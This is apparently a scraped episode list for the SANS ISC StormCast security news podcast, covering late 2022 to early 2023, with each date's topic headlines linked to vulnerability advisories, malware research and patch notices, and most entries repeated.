Kyverno's container image signature verification bypass https://www.armosec.io/blog/cve-2022-47633-kyvernos-container-image-signature-verification/ Google Smart Spaeker Vulnerability https://downrightnifty.me/blog/2022/12/26/hacking-google-home.html Verizon Decomissions 3G CDMA Network https://www.fiercewireless.com/wireless/verizon-tells-3g-customers-upgrade-they-lose-service EarSpy: Spying Caller Speech and Identity Through Speaker Vibrations https://arxiv.org/pdf/2212.12151.pdf
1/3/20235 minutes, 52 seconds
Episode Artwork

ISC StormCast for Monday, January 2nd, 2023

SPF and DMARC use on GOV domains in different ccTLDs https://isc.sans.edu/forums/diary/SPF+and+DMARC+use+on+GOV+domains+in+different+ccTLDs/29384/ CVE-2022-47939 ksmbd Vulnerability https://ubuntu.com/security/CVE-2022-47939 Netgear Vulnerabilities https://kb.netgear.com/000065495/Security-Advisory-for-Pre-Authentication-Buffer-Overflow-on-Some-Routers-PSV-2019-0208 PyTorch Malicious Dependency https://pytorch.org/blog/compromised-nightly-dependency/
1/2/20236 minutes, 23 seconds
Episode Artwork

ISC StormCast for Monday, January 2nd, 2023

SPF and DMARC use on GOV domains in different ccTLDs https://isc.sans.edu/forums/diary/SPF+and+DMARC+use+on+GOV+domains+in+different+ccTLDs/29384/ CVE-2022-47939 ksmbd Vulnerability https://ubuntu.com/security/CVE-2022-47939 Netgear Vulnerabilities https://kb.netgear.com/000065495/Security-Advisory-for-Pre-Authentication-Buffer-Overflow-on-Some-Routers-PSV-2019-0208 PyTorch Malicious Dependency https://pytorch.org/blog/compromised-nightly-dependency/
1/2/20236 minutes, 23 seconds
Episode Artwork

ISC StormCast for Friday, December 23rd, 2022

Exchange OWASSRF Exploited for Remote Code Execution https://isc.sans.edu/forums/diary/Exchange%20OWASSRF%20Exploited%20for%20Remote%20Code%20Execution/29374/ ksmbd Vulnerability https://www.zerodayinitiative.com/advisories/ZDI-22-1690/ LastPass Incident Update https://blog.lastpass.com/2022/12/notice-of-recent-security-incident/
12/23/20226 minutes, 35 seconds
Episode Artwork

ISC StormCast for Friday, December 23rd, 2022

Exchange OWASSRF Exploited for Remote Code Execution https://isc.sans.edu/forums/diary/Exchange%20OWASSRF%20Exploited%20for%20Remote%20Code%20Execution/29374/ ksmbd Vulnerability https://www.zerodayinitiative.com/advisories/ZDI-22-1690/ LastPass Incident Update https://blog.lastpass.com/2022/12/notice-of-recent-security-incident/
12/23/20226 minutes, 35 seconds
Episode Artwork

ISC StormCast for Thursday, December 22nd, 2022

Quick NTP Measurement https://isc.sans.edu/diary/Can%20you%20please%20tell%20me%20what%20time%20it%20is%3F%20Adventures%20with%20public%20NTP%20servers./29368 FBI Favors Ad Blockers https://www.ic3.gov/Media/Y2022/PSA221221 Hidden Costs of Parental Control Apps https://sec-consult.com/blog/detail/the-hidden-costs-of-parental-control-apps/ ProxyNotShell Mitigtation Bypass https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/
12/22/20226 minutes
Episode Artwork

ISC StormCast for Thursday, December 22nd, 2022

Quick NTP Measurement https://isc.sans.edu/diary/Can%20you%20please%20tell%20me%20what%20time%20it%20is%3F%20Adventures%20with%20public%20NTP%20servers./29368 FBI Favors Ad Blockers https://www.ic3.gov/Media/Y2022/PSA221221 Hidden Costs of Parental Control Apps https://sec-consult.com/blog/detail/the-hidden-costs-of-parental-control-apps/ ProxyNotShell Mitigtation Bypass https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/
12/22/20226 minutes
Episode Artwork

ISC StormCast for Wednesday, December 21st, 2022

Linux File System Monitoring and Actions https://isc.sans.edu/diary/Linux%20File%20System%20Monitoring%20%26%20Actions/29362 Feed of NTP Server IP Addresses https://isc.sans.edu/api/threatlist/ntpservers?json Feed of Mastodon Server IP Addresses https://isc.sans.edu/api/threatlist/mastodon?json Packet Tuesday TLS Server Hello https://www.youtube.com/watch?v=2HymU4dxWEQ Android Preparing Support for Updatable Root Certificates https://blog.esper.io/android-14-updatable-certificates/ Elastic IP Hijacking https://www.mitiga.io/blog/elastic-ip-hijacking-a-new-attack-vector-in-aws Microsoft Fixes HyperV issues With Latest Patch https://learn.microsoft.com/en-us/windows/release-health/windows-message-center#2988
12/21/20227 minutes, 20 seconds
Episode Artwork

ISC StormCast for Wednesday, December 21st, 2022

Linux File System Monitoring and Actions https://isc.sans.edu/diary/Linux%20File%20System%20Monitoring%20%26%20Actions/29362 Feed of NTP Server IP Addresses https://isc.sans.edu/api/threatlist/ntpservers?json Feed of Mastodon Server IP Addresses https://isc.sans.edu/api/threatlist/mastodon?json Packet Tuesday TLS Server Hello https://www.youtube.com/watch?v=2HymU4dxWEQ Android Preparing Support for Updatable Root Certificates https://blog.esper.io/android-14-updatable-certificates/ Elastic IP Hijacking https://www.mitiga.io/blog/elastic-ip-hijacking-a-new-attack-vector-in-aws Microsoft Fixes HyperV issues With Latest Patch https://learn.microsoft.com/en-us/windows/release-health/windows-message-center#2988
12/21/20227 minutes, 20 seconds
Episode Artwork

ISC StormCast for Tuesday, December 20th, 2022

Hunting for Mastodon Servers https://isc.sans.edu/diary/Hunting%20for%20Mastodon%20Servers/29358 KB5021233 Blue Screen https://learn.microsoft.com/en-us/windows/release-health/status-windows-10-22H2#2986msgdesc Edge Update will disable Internet Explorer in February https://learn.microsoft.com/en-us/deployedge/edge-learnmore-neededge Gatekeeper's Achilles heel: Unearthin a macOS vulnerability https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/ Corsair Bug not causing keystroke logging https://arstechnica.com/gadgets/2022/12/corsair-says-bug-not-keylogger-behind-some-k100-keyboards-creepy-behavior/ SentinelSneak: Malicious PyPi module poses as security software development kit
12/20/20226 minutes, 19 seconds
Episode Artwork

ISC StormCast for Tuesday, December 20th, 2022

Hunting for Mastodon Servers https://isc.sans.edu/diary/Hunting%20for%20Mastodon%20Servers/29358 KB5021233 Blue Screen https://learn.microsoft.com/en-us/windows/release-health/status-windows-10-22H2#2986msgdesc Edge Update will disable Internet Explorer in February https://learn.microsoft.com/en-us/deployedge/edge-learnmore-neededge Gatekeeper's Achilles heel: Unearthin a macOS vulnerability https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/ Corsair Bug not causing keystroke logging https://arstechnica.com/gadgets/2022/12/corsair-says-bug-not-keylogger-behind-some-k100-keyboards-creepy-behavior/ SentinelSneak: Malicious PyPi module poses as security software development kit
12/20/20226 minutes, 19 seconds
Episode Artwork

ISC StormCast for Monday, December 19th, 2022

Infostealer Malware with Double Extension https://isc.sans.edu/diary/Infostealer%20Malware%20with%20Double%20Extension/29354 Client Side Encryption For GMail https://workspaceupdates.googleblog.com/2022/12/client-side-encryption-for-gmail-beta.html Google Releases OSV Scanner https://github.com/google/osv-scanner/releases/tag/v1.0.1 Samba Security Patches https://thehackernews.com/2022/12/samba-issues-security-updates-to-patch.html Zyxel Router Buffer Overflow https://sec-consult.com/blog/detail/enemy-within-unauthenticated-buffer-overflows-zyxel-routers/
12/19/20226 minutes, 4 seconds
Episode Artwork

ISC StormCast for Monday, December 19th, 2022

Infostealer Malware with Double Extension https://isc.sans.edu/diary/Infostealer%20Malware%20with%20Double%20Extension/29354 Client Side Encryption For GMail https://workspaceupdates.googleblog.com/2022/12/client-side-encryption-for-gmail-beta.html Google Releases OSV Scanner https://github.com/google/osv-scanner/releases/tag/v1.0.1 Samba Security Patches https://thehackernews.com/2022/12/samba-issues-security-updates-to-patch.html Zyxel Router Buffer Overflow https://sec-consult.com/blog/detail/enemy-within-unauthenticated-buffer-overflows-zyxel-routers/
12/19/20226 minutes, 4 seconds
Episode Artwork

ISC StormCast for Friday, December 16th, 2022

Google ads lead to fake software pages pushing IcedID (Bokbot) https://isc.sans.edu/diary/Google%20ads%20lead%20to%20fake%20software%20pages%20pushing%20IcedID%20%28Bokbot%29/29344 HTML smugglers turn to SVG images https://blog.talosintelligence.com/html-smugglers-turn-to-svg-images/ GitHub Improvements https://github.blog/2022-12-14-raising-the-bar-for-software-security-next-steps-for-github-com-2fa/ NIST Retires SHA-1 https://www.nist.gov/news-events/news/2022/12/nist-retires-sha-1-cryptographic-algorithm
12/16/20226 minutes, 3 seconds
Episode Artwork

ISC StormCast for Friday, December 16th, 2022

Google ads lead to fake software pages pushing IcedID (Bokbot) https://isc.sans.edu/diary/Google%20ads%20lead%20to%20fake%20software%20pages%20pushing%20IcedID%20%28Bokbot%29/29344 HTML smugglers turn to SVG images https://blog.talosintelligence.com/html-smugglers-turn-to-svg-images/ GitHub Improvements https://github.blog/2022-12-14-raising-the-bar-for-software-security-next-steps-for-github-com-2fa/ NIST Retires SHA-1 https://www.nist.gov/news-events/news/2022/12/nist-retires-sha-1-cryptographic-algorithm
12/16/20226 minutes, 3 seconds
Episode Artwork

ISC StormCast for Thursday, December 15th, 2022

Microsoft Patch Issues: https://support.microsoft.com/en-us/topic/december-13-2022-kb5021249-os-build-20348-1366-d5fe7608-bc9d-4055-a88c-fb2fd3d5fd45 https://techcommunity.microsoft.com/t5/ask-the-directory-services-team/so-you-say-your-dc-s-memory-is-getting-all-used-up-after/ba-p/3696318 Critical Remote Code Execution Vulneraiblity in SPNEGO Extended Negotiation Security Mechanism https://securityintelligence.com/posts/critical-remote-code-execution-vulnerability-spnego-extended-negotiation-security-mechanism/ VMWare EHCI Controller Vulnerability CVE-2022-31705 https://www.vmware.com/security/advisories/VMSA-2022-0033.html Veem Vulnerability now Exploited https://www.veeam.com/kb4288 nuget / npm / pypi used to host phishing pages https://checkmarx.com/blog/how-140k-nuget-npm-and-pypi-packages-were-used-to-spread-phishing-links/
12/15/20226 minutes, 9 seconds
Episode Artwork

ISC StormCast for Thursday, December 15th, 2022

Microsoft Patch Issues: https://support.microsoft.com/en-us/topic/december-13-2022-kb5021249-os-build-20348-1366-d5fe7608-bc9d-4055-a88c-fb2fd3d5fd45 https://techcommunity.microsoft.com/t5/ask-the-directory-services-team/so-you-say-your-dc-s-memory-is-getting-all-used-up-after/ba-p/3696318 Critical Remote Code Execution Vulneraiblity in SPNEGO Extended Negotiation Security Mechanism https://securityintelligence.com/posts/critical-remote-code-execution-vulnerability-spnego-extended-negotiation-security-mechanism/ VMWare EHCI Controller Vulnerability CVE-2022-31705 https://www.vmware.com/security/advisories/VMSA-2022-0033.html Veem Vulnerability now Exploited https://www.veeam.com/kb4288 nuget / npm / pypi used to host phishing pages https://checkmarx.com/blog/how-140k-nuget-npm-and-pypi-packages-were-used-to-spread-phishing-links/
12/15/20226 minutes, 9 seconds
Episode Artwork

ISC StormCast for Wednesday, December 14th, 2022

Microsoft Patches https://isc.sans.edu/diary/Microsoft%20December%202022%20Patch%20Tuesday/29336 Apple Patches https://isc.sans.edu/diary/Apple%20Updates%20Everything/29338 Citrix Patches https://www.citrix.com/blogs/2022/12/13/critical-security-update-now-available-for-citrix-adc-citrix-gateway/
12/14/20226 minutes, 28 seconds
Episode Artwork

ISC StormCast for Wednesday, December 14th, 2022

Microsoft Patches https://isc.sans.edu/diary/Microsoft%20December%202022%20Patch%20Tuesday/29336 Apple Patches https://isc.sans.edu/diary/Apple%20Updates%20Everything/29338 Citrix Patches https://www.citrix.com/blogs/2022/12/13/critical-security-update-now-available-for-citrix-adc-citrix-gateway/
12/14/20226 minutes, 28 seconds
Episode Artwork

ISC StormCast for Tuesday, December 13th, 2022

Quickie: CyberChef Sorting By String Length https://isc.sans.edu/diary/Quickie%3A%20CyberChef%20Sorting%20By%20String%20Length/29328 FortiOS Buffer Overlow https://www.fortiguard.com/psirt/FG-IR-22-398 A Custom Python Backdoor for VMWare ESXi Servers https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers Fuzzing Ping https://tlakh.xyz/fuzzing-ping.html
12/13/20226 minutes, 21 seconds
Episode Artwork

ISC StormCast for Tuesday, December 13th, 2022

Quickie: CyberChef Sorting By String Length https://isc.sans.edu/diary/Quickie%3A%20CyberChef%20Sorting%20By%20String%20Length/29328 FortiOS Buffer Overlow https://www.fortiguard.com/psirt/FG-IR-22-398 A Custom Python Backdoor for VMWare ESXi Servers https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers Fuzzing Ping https://tlakh.xyz/fuzzing-ping.html
12/13/20226 minutes, 21 seconds
Episode Artwork

ISC StormCast for Monday, December 12th, 2022

Fast Port Scanning in Powershell https://isc.sans.edu/diary/Port%20Scanning%20in%20Powershell%20Redux%3A%20Speeding%20Up%20the%20Results%20%28challenge%20accepted!%29/29324 Bypassing WAFs with JSON https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf Invisbile npm malware evading security checks https://jfrog.com/blog/invisible-npm-malware-evading-security-checks-with-crafted-versions/ PCI Secre Software Standard V 1.2 https://docs-prv.pcisecuritystandards.org/Software%20Security/Standard/PCI-Secure-Software-Standard-v1_2.pdf VMWare/VCenter Patches https://www.vmware.com/security/advisories/VMSA-2022-0030.html
12/12/20226 minutes, 42 seconds
Episode Artwork

ISC StormCast for Monday, December 12th, 2022

Fast Port Scanning in Powershell https://isc.sans.edu/diary/Port%20Scanning%20in%20Powershell%20Redux%3A%20Speeding%20Up%20the%20Results%20%28challenge%20accepted!%29/29324 Bypassing WAFs with JSON https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf Invisbile npm malware evading security checks https://jfrog.com/blog/invisible-npm-malware-evading-security-checks-with-crafted-versions/ PCI Secre Software Standard V 1.2 https://docs-prv.pcisecuritystandards.org/Software%20Security/Standard/PCI-Secure-Software-Standard-v1_2.pdf VMWare/VCenter Patches https://www.vmware.com/security/advisories/VMSA-2022-0030.html
12/12/20226 minutes, 42 seconds
Episode Artwork

ISC StormCast for Friday, December 9th, 2022

Finding Gaps in Syslog https://isc.sans.edu/diary/Finding%20Gaps%20in%20Syslog%20-%20How%20to%20find%20when%20nothing%20happened/29314 Internet Explorer Vulnerabilty used in Malicious Word Document https://blog.google/threat-analysis-group/internet-explorer-0-day-exploited-by-north-korean-actor-apt37/ Zombinder Obfuscation Service used by Ermac https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html Cisco IP Phone Vulnerability CVE-2022-20968 https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ipp-oobwrite-8cMF5r7U daloRADIUS Vulnerablity CVE-2022-23475 https://securityonline.info/cve-2022-23475-account-take-over-flaw-in-open-source-radius-web-management-app/ SANS Holiday Hack Challenge https://www.sans.org/mlp/holiday-hack-challenge/
12/9/20225 minutes, 43 seconds
Episode Artwork

ISC StormCast for Friday, December 9th, 2022

Finding Gaps in Syslog https://isc.sans.edu/diary/Finding%20Gaps%20in%20Syslog%20-%20How%20to%20find%20when%20nothing%20happened/29314 Internet Explorer Vulnerabilty used in Malicious Word Document https://blog.google/threat-analysis-group/internet-explorer-0-day-exploited-by-north-korean-actor-apt37/ Zombinder Obfuscation Service used by Ermac https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html Cisco IP Phone Vulnerability CVE-2022-20968 https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ipp-oobwrite-8cMF5r7U daloRADIUS Vulnerablity CVE-2022-23475 https://securityonline.info/cve-2022-23475-account-take-over-flaw-in-open-source-radius-web-management-app/ SANS Holiday Hack Challenge https://www.sans.org/mlp/holiday-hack-challenge/
12/9/20225 minutes, 43 seconds
Episode Artwork

ISC StormCast for Thursday, December 8th, 2022

ZeroBot / WSZero IoT Botnet https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities https://blog.netlab.360.com/new-ddos-botnet-wszeor/ Cacti Vulnerability CVE-2022-46169 https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf Wireshark Updates https://www.wireshark.org/docs/relnotes/wireshark-4.0.2.html Apple iCloud Security Improvements https://www.apple.com/newsroom/2022/12/apple-advances-user-security-with-powerful-new-data-protections/
12/8/20225 minutes, 10 seconds
Episode Artwork

ISC StormCast for Thursday, December 8th, 2022

ZeroBot / WSZero IoT Botnet https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities https://blog.netlab.360.com/new-ddos-botnet-wszeor/ Cacti Vulnerability CVE-2022-46169 https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf Wireshark Updates https://www.wireshark.org/docs/relnotes/wireshark-4.0.2.html Apple iCloud Security Improvements https://www.apple.com/newsroom/2022/12/apple-advances-user-security-with-powerful-new-data-protections/
12/8/20225 minutes, 10 seconds
Episode Artwork

ISC StormCast for Wednesday, December 7th, 2022

Mirai Botnet and Gafgyt DDoS Team Up https://isc.sans.edu/forums/diary/Mirai%20Botnet%20and%20Gafgyt%20DDoS%20Team%20Up%20Against%20SOHO%20Routers./29304/Gafgyt/Mirai Sample; Packet Tuesday; Packet Tuesday Episode 4: TLS Client Hello https://www.youtube.com/playlist?list=PLs4eo9Tja8biVteSW4a3GHY8qi0t1lFLL Defcon Skimming: A new batch of Web Skimming attacks https://blog.jscrambler.com/defcon-skimming-a-new-batch-of-web-skimming-attacks Fake D-Link Vulnerability used by Moobot https://vulncheck.com/blog/moobot-uses-fake-vulnerability Android Patches CVE-2022-20411 https://source.android.com/docs/security/bulletin/2022-12-01?hl=en
12/7/20225 minutes, 32 seconds
Episode Artwork

ISC StormCast for Wednesday, December 7th, 2022

Mirai Botnet and Gafgyt DDoS Team Up https://isc.sans.edu/forums/diary/Mirai%20Botnet%20and%20Gafgyt%20DDoS%20Team%20Up%20Against%20SOHO%20Routers./29304/Gafgyt/Mirai Sample; Packet Tuesday; Packet Tuesday Episode 4: TLS Client Hello https://www.youtube.com/playlist?list=PLs4eo9Tja8biVteSW4a3GHY8qi0t1lFLL Defcon Skimming: A new batch of Web Skimming attacks https://blog.jscrambler.com/defcon-skimming-a-new-batch-of-web-skimming-attacks Fake D-Link Vulnerability used by Moobot https://vulncheck.com/blog/moobot-uses-fake-vulnerability Android Patches CVE-2022-20411 https://source.android.com/docs/security/bulletin/2022-12-01?hl=en
12/7/20225 minutes, 32 seconds
Episode Artwork

ISC StormCast for Tuesday, December 6th, 2022

VLCs Check For Updates No Updates https://isc.sans.edu/diary/VLCs+Check+For+Updates+No+Updates/29300 AMI MegaRAC Baseboard Managment Controller Vulnerabilities https://eclypsium.com/2022/12/05/supply-chain-vulnerabilities-put-server-ecosystem-at-risk/ Netgear IPv6 Firewall Misconfiguration https://medium.com/tenable-techblog/netgear-router-network-misconfiguration-70ac695c81a6 Veritas NetBackup Patch https://www.veritas.com/content/support/en_US/security/VTS22-019
12/6/20225 minutes, 46 seconds
Episode Artwork

ISC StormCast for Tuesday, December 6th, 2022

VLCs Check For Updates No Updates https://isc.sans.edu/diary/VLCs+Check+For+Updates+No+Updates/29300 AMI MegaRAC Baseboard Managment Controller Vulnerabilities https://eclypsium.com/2022/12/05/supply-chain-vulnerabilities-put-server-ecosystem-at-risk/ Netgear IPv6 Firewall Misconfiguration https://medium.com/tenable-techblog/netgear-router-network-misconfiguration-70ac695c81a6 Veritas NetBackup Patch https://www.veritas.com/content/support/en_US/security/VTS22-019
12/6/20225 minutes, 46 seconds
Episode Artwork

ISC StormCast for Monday, December 5th, 2022

QBot Update https://isc.sans.edu/forums/diary/obama224%20distribution%20Qakbot%20tries%20.vhd%20%28virtual%20hard%20disk%29%20images/29294/ Living of the Land: Unix tools in Windows https://isc.sans.edu/diary/Linux%20LOLBins%20Applications%20Available%20in%20Windows/29296 https://isc.sans.edu/forums/diary/Fingerexe+LOLBin/29298/ CVE-2022-44721 Crowdstrike Falcon Uninstaller https://github.com/purplededa/CVE-2022-44721-CsFalconUninstaller Android Platform Key Leak https://twitter.com/MishaalRahman/status/1598426974594433025 GitHub Pipeline Vulnerability https://www.legitsecurity.com/blog/artifact-poisoning-vulnerability-discovered-in-rust
12/5/20229 minutes, 2 seconds
Episode Artwork

ISC StormCast for Monday, December 5th, 2022

QBot Update https://isc.sans.edu/forums/diary/obama224%20distribution%20Qakbot%20tries%20.vhd%20%28virtual%20hard%20disk%29%20images/29294/ Living of the Land: Unix tools in Windows https://isc.sans.edu/diary/Linux%20LOLBins%20Applications%20Available%20in%20Windows/29296 https://isc.sans.edu/forums/diary/Fingerexe+LOLBin/29298/ CVE-2022-44721 Crowdstrike Falcon Uninstaller https://github.com/purplededa/CVE-2022-44721-CsFalconUninstaller Android Platform Key Leak https://twitter.com/MishaalRahman/status/1598426974594433025 GitHub Pipeline Vulnerability https://www.legitsecurity.com/blog/artifact-poisoning-vulnerability-discovered-in-rust
12/5/20229 minutes, 2 seconds
Episode Artwork

ISC StormCast for Friday, December 2nd, 2022

Quarkus Java Framework Vulnerability CVE-2022-4116 https://www.contrastsecurity.com/security-influencers/localhost-attack-against-quarkus-developers-contrast-security https://access.redhat.com/security/cve/CVE-2022-4116 FreeBSD Ping RCE CVE-2022-23093 https://www.freebsd.org/security/advisories/FreeBSD-SA-22:15.ping.asc NVidia GPU Display Driver Vulnerablities CVE-2022-34669 https://nvidia.custhelp.com/app/answers/detail/a_id/5415 TrustCor CA Revoked https://www.washingtonpost.com/technology/2022/11/30/trustcor-internet-authority-mozilla/ Android Platform Certificates Used to Sign Malware https://bugs.chromium.org/p/apvi/issues/detail?id=100
12/2/20226 minutes, 25 seconds
Episode Artwork

ISC StormCast for Friday, December 2nd, 2022

Quarkus Java Framework Vulnerability CVE-2022-4116 https://www.contrastsecurity.com/security-influencers/localhost-attack-against-quarkus-developers-contrast-security https://access.redhat.com/security/cve/CVE-2022-4116 FreeBSD Ping RCE CVE-2022-23093 https://www.freebsd.org/security/advisories/FreeBSD-SA-22:15.ping.asc NVidia GPU Display Driver Vulnerablities CVE-2022-34669 https://nvidia.custhelp.com/app/answers/detail/a_id/5415 TrustCor CA Revoked https://www.washingtonpost.com/technology/2022/11/30/trustcor-internet-authority-mozilla/ Android Platform Certificates Used to Sign Malware https://bugs.chromium.org/p/apvi/issues/detail?id=100
12/2/20226 minutes, 25 seconds
Episode Artwork

ISC StormCast for Thursday, December 1st, 2022

What is the deal wtih these router vulnerabilities https://isc.sans.edu/diary/Whats+the+deal+with+these+router+vulnerabilities/29288/ Apple Updates https://support.apple.com/en-us/HT201222 VLC Media Player Updates CVE-2022-41325 https://www.videolan.org/security/sb-vlc3018.html VIN used to authenticate to Sirius XM Connected Vehicle Services https://www.theregister.com/2022/11/30/siriusxm_connected_cars_hacking/
12/1/20225 minutes, 42 seconds
Episode Artwork

ISC StormCast for Thursday, December 1st, 2022

What is the deal wtih these router vulnerabilities https://isc.sans.edu/diary/Whats+the+deal+with+these+router+vulnerabilities/29288/ Apple Updates https://support.apple.com/en-us/HT201222 VLC Media Player Updates CVE-2022-41325 https://www.videolan.org/security/sb-vlc3018.html VIN used to authenticate to Sirius XM Connected Vehicle Services https://www.theregister.com/2022/11/30/siriusxm_connected_cars_hacking/
12/1/20225 minutes, 42 seconds
Episode Artwork

ISC StormCast for Wednesday, November 30th, 2022

LinkedIn Bots https://isc.sans.edu/diary/Identifying%20Groups%20of%20%22Bot%22%20Accounts%20on%20LinkedIn/29282 Oracle Fusion Middle Ware Exploited CVE-2021-35587 https://www.cisa.gov/known-exploited-vulnerabilities-catalog Windows IKE Flaw Exploited CVE-2022-34721 https://www.cyfirma.com/outofband/windows-internet-key-exchange-ike-remote-code-execution-vulnerability-analysis/ Anker Eufy Cameras Sending Images to Cloud even if asked not to https://www.macrumors.com/2022/11/29/eufy-camera-cloud-uploads-no-user-consent/ Packet Tuesday https://packettuesday.com SANS Holiday Hack Challenge Sign Up https://www.sans.org/mlp/holiday-hack-challenge/
11/30/20226 minutes, 46 seconds
Episode Artwork

ISC StormCast for Wednesday, November 30th, 2022

LinkedIn Bots https://isc.sans.edu/diary/Identifying%20Groups%20of%20%22Bot%22%20Accounts%20on%20LinkedIn/29282 Oracle Fusion Middle Ware Exploited CVE-2021-35587 https://www.cisa.gov/known-exploited-vulnerabilities-catalog Windows IKE Flaw Exploited CVE-2022-34721 https://www.cyfirma.com/outofband/windows-internet-key-exchange-ike-remote-code-execution-vulnerability-analysis/ Anker Eufy Cameras Sending Images to Cloud even if asked not to https://www.macrumors.com/2022/11/29/eufy-camera-cloud-uploads-no-user-consent/ Packet Tuesday https://packettuesday.com SANS Holiday Hack Challenge Sign Up https://www.sans.org/mlp/holiday-hack-challenge/
11/30/20226 minutes, 46 seconds
Episode Artwork

ISC StormCast for Tuesday, November 29th, 2022

Ukraine Themed Twitter Spam Pushing iOS Scareware https://isc.sans.edu/diary/Ukraine%20Themed%20Twitter%20Spam%20Pushing%20iOS%20Scareware/29276 Google Maps Privacy Issues https://garrit.xyz/posts/2022-11-24-smart-move-google ACER UEFI BIOS Vulnerabilities https://community.acer.com/en/kb/articles/15520-security-vulnerability-regarding-vulnerability-that-may-allow-changes-to-secure-boot-settings OpenSSL Usage in UEFI Firmware Exposes Weakness in SBOMs https://www.binarly.io/posts/OpenSSL_Usage_in_UEFI_Firmware_Exposes_Weakness_in_SBOMs/index.html
11/29/20227 minutes, 4 seconds
Episode Artwork

ISC StormCast for Tuesday, November 29th, 2022

Ukraine Themed Twitter Spam Pushing iOS Scareware https://isc.sans.edu/diary/Ukraine%20Themed%20Twitter%20Spam%20Pushing%20iOS%20Scareware/29276 Google Maps Privacy Issues https://garrit.xyz/posts/2022-11-24-smart-move-google ACER UEFI BIOS Vulnerabilities https://community.acer.com/en/kb/articles/15520-security-vulnerability-regarding-vulnerability-that-may-allow-changes-to-secure-boot-settings OpenSSL Usage in UEFI Firmware Exposes Weakness in SBOMs https://www.binarly.io/posts/OpenSSL_Usage_in_UEFI_Firmware_Exposes_Weakness_in_SBOMs/index.html
11/29/20227 minutes, 4 seconds
Episode Artwork

ISC StormCast for Monday, November 28th, 2022

Log4Shell campaigns are using Nashorn to get reverse shell on victim's machines https://isc.sans.edu/diary/Log4Shell%20campaigns%20are%20using%20Nashorn%20to%20get%20reverse%20shell%20on%20victim%27s%20machines/29266 Attackers Keep Phishing Victms Under Stress https://isc.sans.edu/diary/Attackers%20Keep%20Phishing%20Victims%20Under%20Stress/29270 Vulnerable SDK components lead to supply chian risks in IoT and OT environments https://www.microsoft.com/en-us/security/blog/2022/11/22/vulnerable-sdk-components-lead-to-supply-chain-risks-in-iot-and-ot-environments/ Google Chrome Patches 0-Day https://chromereleases.googleblog.com/2022/11/stable-channel-update-for-desktop_24.html Hacking Smartwatches for Spear Phishing https://cybervelia.com/?p=1380
11/28/20227 minutes
Episode Artwork

ISC StormCast for Monday, November 28th, 2022

Log4Shell campaigns are using Nashorn to get reverse shell on victim's machines https://isc.sans.edu/diary/Log4Shell%20campaigns%20are%20using%20Nashorn%20to%20get%20reverse%20shell%20on%20victim%27s%20machines/29266 Attackers Keep Phishing Victms Under Stress https://isc.sans.edu/diary/Attackers%20Keep%20Phishing%20Victims%20Under%20Stress/29270 Vulnerable SDK components lead to supply chian risks in IoT and OT environments https://www.microsoft.com/en-us/security/blog/2022/11/22/vulnerable-sdk-components-lead-to-supply-chain-risks-in-iot-and-ot-environments/ Google Chrome Patches 0-Day https://chromereleases.googleblog.com/2022/11/stable-channel-update-for-desktop_24.html Hacking Smartwatches for Spear Phishing https://cybervelia.com/?p=1380
11/28/20227 minutes
Episode Artwork

ISC StormCast for Friday, November 18th, 2022

Lessons Learned from Automatic Failover https://isc.sans.edu/diary/Lessons%20Learned%20from%20Automatic%20Failover%3A%20When%208.8.8.8%20%22disappears%22.%20IPv6%20to%20the%20Rescue%3F/29260 Bitbucket Server and Data Center Vulnerability https://jira.atlassian.com/browse/BSERV-13522 Amazon RDS Snapshot Leaks https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots Adobe Commerce merchants to be hit with TrojanOrders this season https://sansec.io/research/trojanorder-magento SANS EDU Research: Detecting and Mitigating the GateKeeper User Override on macOS in an Enterprise Environment; Antonio Piazza https://www.sans.edu/cyber-research/detecting-and-mitigating-the-gatekeeper-user-override-on-macos-in-an-enterprise-environment/
11/18/202214 minutes, 5 seconds
Episode Artwork

ISC StormCast for Friday, November 18th, 2022

Lessons Learned from Automatic Failover https://isc.sans.edu/diary/Lessons%20Learned%20from%20Automatic%20Failover%3A%20When%208.8.8.8%20%22disappears%22.%20IPv6%20to%20the%20Rescue%3F/29260 Bitbucket Server and Data Center Vulnerability https://jira.atlassian.com/browse/BSERV-13522 Amazon RDS Snapshot Leaks https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots Adobe Commerce merchants to be hit with TrojanOrders this season https://sansec.io/research/trojanorder-magento SANS EDU Research: Detecting and Mitigating the GateKeeper User Override on macOS in an Enterprise Environment; Antonio Piazza https://www.sans.edu/cyber-research/detecting-and-mitigating-the-gatekeeper-user-override-on-macos-in-an-enterprise-environment/
11/18/202214 minutes, 5 seconds
Episode Artwork

ISC StormCast for Thursday, November 17th, 2022

Evil Maid Attacks - Remediation for the Cheap https://isc.sans.edu/diary/Evil%20Maid%20Attacks%20-%20Remediation%20for%20the%20Cheap/29256 F5 Big IP CVE-2022-41622 and CVE-2022-41800 Vulnerability Details https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/ Details about iPad/iOS Neural Engine Vulnerability CVE-2022-32899 https://github.com/0x36/weightBufs/ Disneyland Malware Team: It's a Puny World After All https://krebsonsecurity.com/2022/11/disneyland-malware-team-its-a-puny-world-after-all/#more-61870
11/17/20226 minutes, 34 seconds
Episode Artwork

ISC StormCast for Thursday, November 17th, 2022

